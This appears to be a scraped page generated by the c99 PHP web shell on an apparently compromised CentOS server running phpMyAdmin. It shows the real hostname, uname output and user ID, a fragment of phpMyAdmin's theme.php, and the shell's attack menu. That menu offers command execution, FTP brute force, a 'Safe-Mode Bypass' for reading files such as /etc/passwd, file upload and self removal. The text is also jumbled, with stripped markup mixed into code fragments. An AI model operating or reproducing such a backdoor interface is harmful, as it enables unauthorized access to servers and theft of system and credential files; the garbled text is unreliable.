!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/test/   drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     theme.php (9.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |




    phpMyAdmin <?php echo PMA_VERSION; ?> -
        <?php echo htmlspecialchars( $HTTP_HOST ); ?> - Theme Test
    
    
    
    


'
    .'-' . "\n";
$item = ''
    .'  ' . "\n"
    .'%4$s: %3$s' . "\n";

echo '
' . "\n"; printf( $item, $GLOBALS['cfg']['DefaultTabServer'], PMA_generate_common_url(), 'Server', $GLOBALS['strServer'], 's_host.png' ); echo $separator; printf( $item, $GLOBALS['cfg']['DefaultTabDatabase'], '', 'Database', $GLOBALS['strDatabase'], 's_db.png' ); echo $separator; printf( $item, $GLOBALS['cfg']['DefaultTabTable'], '', 'Table', (isset($GLOBALS['tbl_is_view']) && $GLOBALS['tbl_is_view'] ? $GLOBALS['strView'] : $GLOBALS['strTable']), (isset($GLOBALS['tbl_is_view']) && $GLOBALS['tbl_is_view'] ? 'b_views' : 's_tbl') . '.png' ); echo '' .'"Table comment"' . "\n"; echo '
'; /** * Displays tab links */ $tabs = array(); $tabs['databases']['icon'] = '../../../../' . $pmaThemeImage . 's_db.png'; $tabs['databases']['link'] = 'server_databases.php'; $tabs['databases']['text'] = $strDatabases; $tabs['sql']['icon'] = '../../../../' . $pmaThemeImage . 'b_sql.png'; $tabs['sql']['link'] = 'server_sql.php'; $tabs['sql']['text'] = $strSQL; $tabs['status']['icon'] = '../../../../' . $pmaThemeImage . 's_status.png'; $tabs['status']['link'] = 'server_status.php'; $tabs['status']['text'] = $strStatus; $tabs['vars']['icon'] = '../../../../' . $pmaThemeImage . 's_vars.png'; $tabs['vars']['link'] = 'server_variables.php'; $tabs['vars']['text'] = $strServerTabVariables; $tabs['charset']['icon'] = '../../../../' . $pmaThemeImage . 's_asci.png'; $tabs['charset']['link'] = 'server_collations.php'; $tabs['charset']['text'] = $strCharsets; $tabs['engine']['icon'] = '../../../../' . $pmaThemeImage . 'b_engine.png'; $tabs['engine']['link'] = 'server_engines.php'; $tabs['engine']['text'] = $strEngines; $tabs['rights']['icon'] = '../../../../' . $pmaThemeImage . 's_rights.png'; $tabs['rights']['link'] = 'server_privileges.php'; $tabs['rights']['text'] = $strPrivileges; $tabs['binlog']['icon'] = '../../../../' . $pmaThemeImage . 's_tbl.png'; $tabs['binlog']['link'] = 'server_binlog.php'; $tabs['binlog']['text'] = $strBinaryLog; $tabs['process']['icon'] = '../../../../' . $pmaThemeImage . 's_process.png'; $tabs['process']['link'] = 'server_processlist.php'; $tabs['process']['text'] = 'caution'; $tabs['process']['class'] = 'caution'; $tabs['export']['icon'] = '../../../../' . $pmaThemeImage . 'b_export.png'; $tabs['export']['text'] = 'disabled'; $tabs['export2']['icon'] = '../../../../' . $pmaThemeImage . 'b_export.png'; $tabs['export2']['text'] = 'disabled caution'; $tabs['export2']['class'] = 'caution'; $tabs['import']['icon'] = '../../../../' . $pmaThemeImage . 'b_import.png'; $tabs['import']['link'] = 'server_import.php'; $tabs['import']['text'] = 'active'; $tabs['import']['class'] = 'active'; echo PMA_getTabs( $tabs ); unset( $tabs ); if ( @file_exists( $pmaThemeImage . 'logo_right.png') ) { ?> phpMyAdmin

phpMyAdmin ' . PMA_VERSION . ''); ?>


getHtmlSelectBox( false ); ?>

H1 Header

H2 Header

H3 Header

H4 Header

Notice header!

notice message box content!

Notice message box header!

notice message box content!

Warning header!

warning message box content!

Warning message box header!

warning message box content!

Error header!

error message box content!

Error message box header!

error message box content!
Confirmation fieldset QUERY TO EXECUTE;
table.data caption
table.data thead tr th table.data thead tr th action table.data thead tr th
table.data tfoot tr th table.data tfoot tr th action table.data tfoot tr th
td.value drop drop drop table.data tbody tr.odd td
td.value drop drop drop table.data tbody tr.even td
td.value drop drop drop table.data tbody tr.odd td
td.value drop drop drop table.data tbody tr.even td

bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0052 ]--